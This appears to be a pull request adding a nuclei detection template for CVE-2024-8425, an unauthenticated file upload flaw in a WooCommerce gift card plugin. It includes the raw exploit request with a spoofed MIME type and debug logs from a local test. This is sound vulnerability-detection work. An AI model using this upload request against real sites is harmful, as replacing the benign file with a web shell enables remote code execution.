Template / PR Information

Added CVE-2024-8425 - WooCommerce Ultimate Gift Card ≤ 2.6.0 Arbitrary File Upload vulnerability detection template

This template detects an unauthenticated arbitrary file upload vulnerability in the WooCommerce Ultimate Gift Card WordPress plugin. The vulnerability exists due to insufficient file type validation that relies on client-controlled MIME types in the mwb_wgm_preview_mail function.

References:

• CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8425
• NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8425
• PoC: https://github.com/KTN1990/CVE-2024-8425
• Plugin: WooCommerce Ultimate Gift Card (CodeCanyon)

Template Validation

I’ve validated this template locally?

• YES
• NO

Additional Details

Vulnerability Details:

• CVSS Score: 9.8 (Critical)
• Attack Vector: Network, No authentication required
• Impact: Remote Code Execution via arbitrary file upload

Detection Method:

1. Uploads a benign text file with spoofed Content-Type: image/jpeg header to bypass MIME validation
2. Verifies successful upload by fetching the file from /wp-content/uploads/mwb_browse/
3. Non-intrusive - only uploads a harmless text file for verification

HTTP Request/Response Snippet:

POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123456

------WebKitFormBoundary123456
Content-Disposition: form-data; name="file"; filename="test-12345.txt"
Content-Type: image/jpeg

CVE-2024-8425-VERIFICATION-1234
------WebKitFormBoundary123456--

Response (successful exploitation):

http://target/?mwb_wgm_preview_email=mwb_wgm_single_page_popup&name=test-12345.txt&...

Verification GET request confirms file upload:

GET /wp-content/uploads/mwb_browse/test-12345.txt
HTTP/1.1 200 OK
Content-Type: text/plain

CVE-2024-8425-VERIFICATION-1234

Testing Environment:

• Requires mwb_wgm_other_setting_browse option enabled in WordPress
• Docker environment available for reproducible testing

Debug output:

▶  docker run --rm --volume `pwd`:/dev/shm --network host --name nuclei nuclei -t /dev/shm/http/cves/2024/CVE-2024-8425.yaml -u http://localhost:8080 --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] [CVE-2024-8425] Dumped HTTP request for http://localhost:8080/wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail

POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 482
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary989549
Accept-Encoding: gzip

------WebKitFormBoundary989549
Content-Disposition: form-data; name="mwb_wgm_preview_email"

test
------WebKitFormBoundary989549
Content-Disposition: form-data; name="tempId"

1
------WebKitFormBoundary989549
Content-Disposition: form-data; name="message"

security test
------WebKitFormBoundary989549
Content-Disposition: form-data; name="file"; filename="test-84849.txt"
Content-Type: image/jpeg

CVE-2024-8425-VERIFICATION-5999
------WebKitFormBoundary989549--
[DBG] [CVE-2024-8425] Dumped HTTP response http://localhost:8080/wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: text/html; charset=UTF-8
Date: Fri, 05 Sep 2025 07:44:26 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Referrer-Policy: strict-origin-when-cross-origin
Server: Apache/2.4.65 (Debian)
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.29
X-Robots-Tag: noindex

http://localhost:8080/?mwb_wgm_preview_email=mwb_wgm_single_page_popup&tempId=1&message=security+test&name=test-84849.txt&width=630&height=530&TB_iframe=1
[INF] [CVE-2024-8425] Dumped HTTP request for http://localhost:8080/wp-content/uploads/mwb_browse/test-84849.txt

GET /wp-content/uploads/mwb_browse/test-84849.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2024-8425] Dumped HTTP response http://localhost:8080/wp-content/uploads/mwb_browse/test-84849.txt

HTTP/1.1 200 OK
Connection: close
Content-Length: 31
Accept-Ranges: bytes
Content-Type: text/plain
Date: Fri, 05 Sep 2025 07:44:26 GMT
Etag: W/"1f-63e0901d5d8e8"
Last-Modified: Fri, 05 Sep 2025 07:44:26 GMT
Server: Apache/2.4.65 (Debian)

CVE-2024-8425-VERIFICATION-5999
[CVE-2024-8425:status-1] [http] [critical] http://localhost:8080/wp-content/uploads/mwb_browse/test-84849.txt ["CVE-2024-8425-VERIFICATION-5999"]
[CVE-2024-8425:word-2] [http] [critical] http://localhost:8080/wp-content/uploads/mwb_browse/test-84849.txt ["CVE-2024-8425-VERIFICATION-5999"]
[INF] Scan completed in 706.429114ms. 2 matches found.

/claim #12994

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server